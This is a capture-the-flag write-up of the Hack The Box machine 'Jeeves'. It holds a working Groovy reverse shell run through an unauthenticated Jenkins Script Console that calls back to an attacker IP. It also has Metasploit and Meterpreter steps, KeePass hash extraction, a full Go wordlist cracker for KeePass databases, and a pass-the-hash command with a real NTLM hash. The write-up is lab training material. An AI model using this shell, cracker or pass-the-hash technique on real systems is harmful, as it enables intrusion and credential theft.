Hack The Box - Jeeves

5 minute read

JeevesImage


Summary


Jeeves showed that an unauthenticated Jenkins Script Console leads straight to a reverse shell through Groovy, even when the application's directory is unknown and has to be brute-forced first. It also showed how a weak KeePass master password turns into a complete system compromise: the database held an NTLM hash rather than a password, but an NT hash is a password-equivalent credential that can simply be passed over SMB, and hiding the final secret in an NTFS Alternate Data Stream does not hide it from anyone who runs dir /R.

Gaining Access

  • Locate Jetty and 404 page
  • Enumerate Jenkins service
  • Execute reverse shell groovy script

Elevating Privileges

  • Locate CEH KeePass file
  • Upgrade to Meterpreter and download CEH.kdbx
  • Get hash of CEH file for cracking
  • Crack KeePass hash and view contents
  • Pass the hash using the pass-the-hash toolkit
  • View alternate data stream

Write-up


Enumeration

First up I enumerated open ports using Masscan.

masscan -e tun0 -p0-65535 --rate 700 -oL scan 10.10.10.63
Discovered open port 80/tcp on 10.10.10.63
Discovered open port 135/tcp on 10.10.10.63
Discovered open port 445/tcp on 10.10.10.63
Discovered open port 50000/tcp on 10.10.10.63

I then drilled in further with nmap to fingerprint what services were running.

nmap -sV -p 80,135,445,50000 -sS 10.10.10.63
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Locate Jetty and 404 page

Viewing the http service running on port 80 I was greeted by an old school “Ask Jeeves” page.

AskJeeves

Attempting to search for anything threw a fake error page in the form of a picture.

FakeError

Figuring this might be a rabbit hole, I looked at the Jetty service on port 50000 instead; its root returned nothing but a plain Jetty 404 page.

404Page

Enumerate Jenkins service

Interesting. I set up two gobuster instances to look for directories on both the Jetty service and the IIS site, in case I had missed anything.

gobuster -u http://10.10.10.63 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster -u http://10.10.10.63:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

This revealed a new lead: an askjeeves directory on the Jetty service, answering with a 302 redirect rather than a 404.

/askjeeves (Status: 302)

Execute reverse shell groovy script

Within this directory was a Jenkins web interface that required no authentication, excellent. Its “Manage Jenkins” page, which is normally reachable only by administrators (Overall/Administer), exposed a “Script Console”.

ManageJenkins

http://10.10.10.63:50000/askjeeves/script

GroovyScript

A quick search showed that the Script Console executes arbitrary Groovy inside the Jenkins JVM, on the controller itself, with the privileges of the account the Jenkins service runs as, and that a reverse shell for it already existed: plain Java that spawns a process and shuttles its I/O over a socket.

First I set up a listener with Metasploit's multi/handler. Its default payload, generic/shell_reverse_tcp, is the right match for a plain cmd.exe-over-TCP shell.

msfconsole
use exploit/multi/handler
set LPORT 8080
set LHOST 10.10.12.154
exploit

I then modified the reverse shell to connect back to my IP on port 8080.

String host = "10.10.12.154";   // attacker IP (the handler's LHOST)
int port = 8080;                // handler's LPORT
String cmd = "cmd.exe";         // shell to spawn on the Windows host
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
// Shuttle bytes between the process and the socket until the shell exits or the socket closes.
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
};
p.destroy();
s.close();

Gaining Access

I ran this through the Script Console, at which point I had a reverse shell and could read user.txt.


User.txt: e3232…7066a


Locate CEH KeePass file

Looking around the file system I found a file called CEH.kdbx under /Users/kohsuke/Documents/. A .kdbx file is a KeePass 2.x database; to attempt to crack its master password offline I needed it on my own machine.

Upgrade to Meterpreter and download CEH.kdbx

With my standard shell I backgrounded the session and upgraded it by spawning a new Meterpreter shell session.

CTRL+Z
sessions -u 1

This is equivalent to running the shell_to_meterpreter post module by hand:

CTRL+Z
use post/multi/manage/shell_to_meterpreter
set session 1
exploit

At this point I was able to download the CEH KeePass file using the inbuilt Meterpreter functionality.

download /Users/kohsuke/Documents/CEH.kdbx

Get hash of CEH file for cracking

Using keepass2john (shipped with John the Ripper, AKA John) I extracted the header fields john needs to test candidate master passwords. The "2" marks a KeePass 2.x database and 6000 is the number of AES key-transformation rounds, a low work factor by today's standards, so each candidate is cheap to test.

keepass2john CEH.kdbx
CEH:$keepass$*2*6000*222*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48

I saved this to a file called kdbxhash.txt for cracking.

Crack KeePass hash and view contents

I, like many others, used the classic rockyou.txt list to crack the hash. If you don't know the list or the company RockYou, take a look at the Wikipedia page. RockYou was an application developer for popular social networking sites, and rockyou.txt is essentially a large, unaltered list of passwords stolen from one of their SQL databases through “a 10-year-old SQL vulnerability”. The passwords were stored in plaintext, making this one of the most popular and widely used password lists in existence.

Using John and rockyou.txt it was trivial to crack this hash.

john --wordlist=/usr/share/wordlists/rockyou.txt kdbxhash.txt 

moonshine1 (CEH)

Victory: a password. I used it to open CEH.kdbx in KeePass on my Windows machine and checked the entries for anything of interest.

CEHPasswords
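What john does per candidate is cheap enough to show in full. The Go program below is an added example (not john's code and not part of the original write-up): it parses the keepass2john line above and re-implements the KeePass 2.x master key derivation and the check john performs, hashing the password twice with SHA-256, running the result through the AES-256 key transform for the stated number of rounds, hashing again with the master seed, then CBC-decrypting the first 32 bytes of the payload and comparing them with the start bytes stored in the header. The field names are mine; the field layout follows the keepass2john output shown above, and the "222" offset field is skipped because the check does not need it.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"os"
	"strconv"
	"strings"
)

// KdbxHash holds the KDBX 3.1 header fields keepass2john extracts: enough to test candidates without the file.
type KdbxHash struct {
	Name           string
	Rounds         uint64 // AES-KDF transform rounds: the only work factor
	MasterSeed     []byte // 32 bytes
	TransformSeed  []byte // 32 bytes, the AES-256 key used during the transform
	IV             []byte // 16 bytes, CBC IV for the payload
	ExpectedStart  []byte // 32 bytes, stored in the clear in the header
	FirstCipherBlk []byte // first 32 bytes of the encrypted payload
}

// ParseKeepass2John parses one line of the form
// name:$keepass$*2*rounds*offset*masterseed*transformseed*iv*expectedstart*firstblock
func ParseKeepass2John(line string) (*KdbxHash, error) {
	parts := strings.SplitN(strings.TrimSpace(line), ":", 2)
	f := strings.Split(parts[len(parts)-1], "*")
	if len(parts) != 2 || len(f) != 9 || f[0] != "$keepass$" || f[1] != "2" {
		return nil, fmt.Errorf("not a KeePass 2.x keepass2john line")
	}
	rounds, err := strconv.ParseUint(f[2], 10, 64)
	if err != nil {
		return nil, err
	}
	h := &KdbxHash{Name: parts[0], Rounds: rounds}
	dsts := []*[]byte{&h.MasterSeed, &h.TransformSeed, &h.IV, &h.ExpectedStart, &h.FirstCipherBlk}
	for i, want := range []int{32, 32, 16, 32, 32} { // f[3] is the offset field, not needed here
		b, err := hex.DecodeString(f[4+i])
		if err != nil || len(b) != want {
			return nil, fmt.Errorf("field %d: bad hex or length", 4+i)
		}
		*dsts[i] = b
	}
	return h, nil
}

// MasterKey derives the payload key the way KeePass 2.x does for a password-only key:
// composite = SHA256(SHA256(password)); transformed = SHA256(AES-ECB[TransformSeed]^Rounds(composite));
// master = SHA256(MasterSeed || transformed). At 6000 rounds a CPU core tests thousands a second.
func MasterKey(h *KdbxHash, password string) []byte {
	pw := sha256.Sum256([]byte(password))
	composite := sha256.Sum256(pw[:])
	blk, _ := aes.NewCipher(h.TransformSeed) // 32-byte seed validated by ParseKeepass2John
	key := composite[:]
	for i := uint64(0); i < h.Rounds; i++ { // each 16-byte half is encrypted independently
		blk.Encrypt(key[:16], key[:16])
		blk.Encrypt(key[16:], key[16:])
	}
	transformed := sha256.Sum256(key)
	master := sha256.Sum256(append(append([]byte{}, h.MasterSeed...), transformed[:]...))
	return master[:]
}

// TryPassword CBC-decrypts only the first 32 payload bytes and compares them with the
// header's start bytes; a match means the candidate is the master password (john's test).
func TryPassword(h *KdbxHash, password string) bool {
	blk, _ := aes.NewCipher(MasterKey(h, password)) // always a 32-byte key
	plain := make([]byte, len(h.FirstCipherBlk))
	cipher.NewCBCDecrypter(blk, h.IV).CryptBlocks(plain, h.FirstCipherBlk)
	return bytes.Equal(plain, h.ExpectedStart)
}

func main() {
	if len(os.Args) != 3 {
		fmt.Fprintln(os.Stderr, "usage: kdbxcheck kdbxhash.txt wordlist.txt")
		os.Exit(2)
	}
	raw, _ := os.ReadFile(os.Args[1])
	h, err := ParseKeepass2John(string(raw))
	words, werr := os.ReadFile(os.Args[2]) // fine for rockyou-sized lists (about 130 MB)
	if err != nil || werr != nil {
		fmt.Fprintln(os.Stderr, "setup failed:", err, werr)
		os.Exit(1)
	}
	for _, w := range strings.Split(string(words), "\n") {
		w = strings.TrimRight(w, "\r")
		if TryPassword(h, w) {
			fmt.Printf("%s (%s)\n", w, h.Name) // same shape as john's output
			return
		}
	}
	fmt.Println("no match in wordlist")
}
```

Run it as kdbxcheck kdbxhash.txt /usr/share/wordlists/rockyou.txt. The loop in MasterKey is the whole cost per candidate, which is why raising the transform rounds (or, in KDBX 4, switching to Argon2) matters as much as picking a password that is not in rockyou.txt.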

Pass the hash using the pass-the-hash toolkit

Looking through the entries, most were ordinary passwords; however, one entry called “Backup stuff” held what looked like an LM:NT hash pair rather than a password. Given that ports 135 and 445 were open on this box, it was entirely possible that passing this hash over SMB was what was required to gain elevated access. I did this with the pass-the-hash toolkit, specifically pth-winexe, asking for a SYSTEM-level shell with --system.

pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...

And you wouldn’t believe it…I now had system level access.
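An NT hash is MD4 over the UTF-16LE password, with no salt and no iteration, so whatever is written in that KeePass entry is as good as the password itself for NTLM authentication. The Go snippet below is an added example (not part of the original write-up and not the pass-the-hash toolkit's code): it recognises an LM:NT pair of the shape found in the “Backup stuff” entry, computes NT hashes with a minimal MD4 so the equivalence can be checked against a known password, and formats the credential the way pth-winexe's --user expects. The function names and the regular expression are mine; the empty-LM constant is Windows' own.

```go
package main

import (
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"math/bits"
	"regexp"
	"strings"
	"unicode/utf16"
)

// md4 is a minimal RFC 1320 implementation; Go's standard library has no MD4
// (it lives in golang.org/x/crypto) and the NT hash is MD4 of the UTF-16LE password.
func md4(data []byte) [16]byte {
	a, b, c, d := uint32(0x67452301), uint32(0xefcdab89), uint32(0x98badcfe), uint32(0x10325476)
	msg := append(append([]byte{}, data...), 0x80) // pad: 0x80, zeros, 64-bit LE bit length
	for len(msg)%64 != 56 {
		msg = append(msg, 0)
	}
	var lenBuf [8]byte
	binary.LittleEndian.PutUint64(lenBuf[:], uint64(len(data))*8)
	msg = append(msg, lenBuf[:]...)
	f := func(x, y, z uint32) uint32 { return (x & y) | (^x & z) }
	g := func(x, y, z uint32) uint32 { return (x & y) | (x & z) | (y & z) }
	h := func(x, y, z uint32) uint32 { return x ^ y ^ z }
	r3 := [16]int{0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15}
	s1, s2, s3 := [4]int{3, 7, 11, 19}, [4]int{3, 5, 9, 13}, [4]int{3, 9, 11, 15}
	for off := 0; off < len(msg); off += 64 {
		var x [16]uint32
		for i := range x {
			x[i] = binary.LittleEndian.Uint32(msg[off+4*i:])
		}
		aa, bb, cc, dd := a, b, c, d
		for i := 0; i < 16; i++ { // round 1: F, message words in order
			a = bits.RotateLeft32(a+f(b, c, d)+x[i], s1[i%4])
			a, b, c, d = d, a, b, c
		}
		for i := 0; i < 16; i++ { // round 2: G, words 0,4,8,12,1,5,...
			a = bits.RotateLeft32(a+g(b, c, d)+x[(i%4)*4+i/4]+0x5a827999, s2[i%4])
			a, b, c, d = d, a, b, c
		}
		for i := 0; i < 16; i++ { // round 3: H, words 0,8,4,12,2,10,...
			a = bits.RotateLeft32(a+h(b, c, d)+x[r3[i]]+0x6ed9eba1, s3[i%4])
			a, b, c, d = d, a, b, c
		}
		a, b, c, d = a+aa, b+bb, c+cc, d+dd
	}
	var out [16]byte
	for i, v := range [4]uint32{a, b, c, d} {
		binary.LittleEndian.PutUint32(out[4*i:], v)
	}
	return out
}

// NTHash is MD4 over the UTF-16LE password: unsalted and uniterated, so the
// stored hash is a password-equivalent credential for NTLM authentication.
func NTHash(password string) string {
	units := utf16.Encode([]rune(password))
	buf := make([]byte, 2*len(units))
	for i, u := range units {
		binary.LittleEndian.PutUint16(buf[2*i:], u)
	}
	sum := md4(buf)
	return hex.EncodeToString(sum[:])
}

// EmptyLM is the LM hash of an empty password; modern Windows stores it in the LM slot,
// which is why the --user string above starts with it.
const EmptyLM = "aad3b435b51404eeaad3b435b51404ee"

var ntlmPair = regexp.MustCompile(`^([0-9a-fA-F]{32}):([0-9a-fA-F]{32})$`)

// LooksLikeNTLM reports whether a stored "password" is really an LM:NT hash pair,
// the shape of the "Backup stuff" entry, and returns both halves lower-cased.
func LooksLikeNTLM(secret string) (lm, nt string, ok bool) {
	m := ntlmPair.FindStringSubmatch(strings.TrimSpace(secret))
	if m == nil {
		return "", "", false
	}
	return strings.ToLower(m[1]), strings.ToLower(m[2]), true
}

// PthArg builds the DOMAIN/user%LM:NT credential string pth-winexe's --user expects.
func PthArg(domain, user, lm, nt string) string {
	return fmt.Sprintf("%s/%s%%%s:%s", domain, user, lm, nt)
}

func main() {
	secret := "aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00" // the "Backup stuff" entry
	if lm, nt, ok := LooksLikeNTLM(secret); ok {
		fmt.Println("stored secret is an LM:NT pair; pth-winexe --user=" + PthArg("jeeves", "administrator", lm, nt))
	}
	fmt.Println("NT hash of 'password':", NTHash("password")) // 8846f7eaee8fb117ad06bdd830b7586c
}
```

LooksLikeNTLM is also a reasonable check to run over a password-manager export or a backup script: a 32-hex:32-hex value stored as a "password" is a credential that never needs cracking.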

View alternate data stream

Looking in the usual place for root.txt, the Administrator's desktop, I found only a file called hm.txt.

type C:\Users\Administrator\Desktop\hm.txt

The flag is elsewhere. Look deeper

Strange, given this is where root.txt should be, and it told me to “look deeper”, so I checked whether the file carried an NTFS Alternate Data Stream. The OWASP page on the subject is dated (01/19/2011) and says “This is not a well known feature” and “Windows Explorer doesn't provide a way of seeing what alternate data streams are in a file”. The second point still holds, but ADS are far better known now than in 2011, and although Explorer won't show them, the Command Prompt (dir /R) and PowerShell (Get-Item -Stream *) certainly will.

From the shell I listed alternate data streams with the /R switch of dir, which shows every stream attached to each file along with its size.

dir /R

34 hm.txt:root.txt:$DATA

Now I knew hm.txt carried a 34-byte stream named root.txt. cmd's type does not open a stream directly, so I redirected it into more, which let me read the flag and complete the box (PowerShell's Get-Content hm.txt -Stream root.txt does the same).

more < hm.txt:root.txt

Elevating Privileges


root.txt: afbc5…92530


Final Notes

At the time of writing other HTB members had rated the machine elements as shown below. Feel free to reach out and provide any feedback or let me know if this helped.

Heatmap